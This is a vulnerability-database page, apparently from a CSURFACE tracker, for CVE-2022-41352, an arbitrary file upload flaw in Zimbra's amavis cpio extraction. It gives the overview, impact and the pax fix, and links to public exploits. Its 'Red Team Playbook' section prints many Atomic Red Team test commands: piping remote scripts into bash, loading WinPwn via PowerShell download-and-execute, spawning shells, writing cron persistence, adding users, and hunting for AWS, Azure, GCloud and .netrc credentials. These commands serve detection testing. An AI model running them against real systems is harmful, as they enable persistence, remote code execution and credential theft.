CVE-2022-41352
Overview
This vulnerability is an arbitrary file upload issue caused by insecure extraction of cpio archives within the amavis component of Zimbra Collaboration Suite. The root cause lies in amavis using cpio for archive extraction, which allows crafted archives to write files to the web-accessible directory /opt/zimbra/jetty/webapps/zimbra/public. This extraction flaw affects Zimbra Collaboration versions 8.8.15 and 9.0, enabling unauthorized file placement within the web server context.
Vulnerability Description
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.
Impact
An unauthenticated attacker can upload arbitrary files to the Zimbra web server directory, enabling remote code execution and unauthorized access to other user accounts. This allows compromise of sensitive email data, user impersonation, and lateral movement within the collaboration environment. No user interaction or credentials are required to exploit the vulnerability, increasing the attack surface and potential for widespread impact in affected deployments.
Solution
Zimbra recommends installing pax to replace cpio as the archive extraction utility, which amavis will then prefer automatically. Pax is included in Zimbra prerequisites on Ubuntu but must be manually installed on Red Hat-based systems post-RHEL 6. Administrators should follow Zimbra Security Advisories available at https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories for detailed patching instructions and ensure deployment of Zimbra Collaboration Suite versions 8.8.15 and 9.0 with pax configured as the extraction tool to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Zimbra Collaboration Suite (ZCS) arises from a flaw in the file upload mechanism through amavis, specifically leveraging a cpio loophole. This loophole allows an attacker to upload arbitrary files to the server, which can be extracted to a publicly accessible directory. The improper handling of file uploads can lead to unauthorized access to sensitive data or user accounts, as the attacker can manipulate the files to gain elevated privileges or execute malicious code. The reliance on cpio for file extraction, particularly in environments where pax is not available, exacerbates this issue, as it allows for the exploitation of the system's file handling capabilities.
Attack vectors for this vulnerability are multifaceted. An attacker could exploit the flaw by crafting a malicious file that, when uploaded, could overwrite existing files or create new files in sensitive directories. This could lead to a range of exploitation scenarios, such as gaining unauthorized access to user accounts, executing arbitrary code, or even compromising the entire server. The potential for exploitation is particularly high in environments where the server is exposed to the internet, as attackers can leverage automated tools to probe for vulnerable instances of ZCS. Furthermore, the lack of proper input validation and sanitization in the file upload process increases the risk of successful exploitation.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Zimbra for their email and collaboration needs. Unauthorized access to user accounts can lead to data breaches, loss of sensitive information, and damage to the organization's reputation. Additionally, the potential for attackers to deploy malware or ransomware through this vulnerability poses a severe business risk, as it could disrupt operations and lead to financial losses. Organizations that fail to address this vulnerability may also face regulatory repercussions, especially if they handle sensitive personal data or are subject to data protection laws.
Detection and mitigation strategies are crucial for organizations using ZCS. Regular security assessments and vulnerability scans should be conducted to identify any instances of the vulnerability in the environment. Implementing strict file upload controls, such as whitelisting allowed file types and enforcing size limits, can significantly reduce the risk of exploitation. Additionally, organizations should prioritize the installation of pax, as recommended by Zimbra, to replace cpio for file extraction processes. Keeping the software updated with the latest security patches and configurations is essential for maintaining a secure environment. Training employees on security best practices, including recognizing phishing attempts that may exploit this vulnerability, can further bolster defenses.
In conclusion, the vulnerability in Zimbra Collaboration Suite presents a serious threat to organizations that utilize this platform for communication and collaboration. The technical details highlight the ease with which an attacker can exploit the flaw, while the potential real-world impacts underscore the importance of proactive security measures. By implementing robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the integrity and confidentiality of their data.
Affected Products (63)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:-:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p10:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p11:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p12:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p13:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p14:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p15:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p16:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p17:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p18:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p19:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p2:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p20:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p21:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p22:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p23:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p24:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p24.1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 9.0.0 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:9.0.0:p25:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
TAR Path Traversal in Zimbra (CVE-2022-41352)
exploits/linux/http/zimbra_cpio_cve_2022_41352
|
Alexander Cherepanov, yeak, Ron Bowes | Unknown | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Cr4ckC4t/cve-2022-41352-zimbra-rce
Zimbra <9.0.0.p27 RCE
|
Cr4ckC4t | 109 | 23 | 2022-11-11 | View |
|
segfault-it/cve-2022-41352
cve-2022-41352 poc
|
segfault-it | 8 | 1 | 2022-10-10 | View |
|
qailanet/cve-2022-41352-zimbra-rce
|
qailanet | 0 | 0 | 2023-12-10 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-41352 |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories |
| wiki.zimbra.com |
GitHub CVE
|
https://wiki.zimbra.com/wiki/Security_Center |
| forums.zimbra.org |
GitHub CVE
|
https://forums.zimbra.org/viewtopic.php?t=71153&p=306532 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/169458/Zimbra-Collaboration-Suite-TAR-Path-Traversal.html |
| secpod.com |
GitHub CVE
|
https://www.secpod.com/blog/unpatched-rce-bug-in-zimbra-collaboration-suite-exploited-in-wild/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-41352 |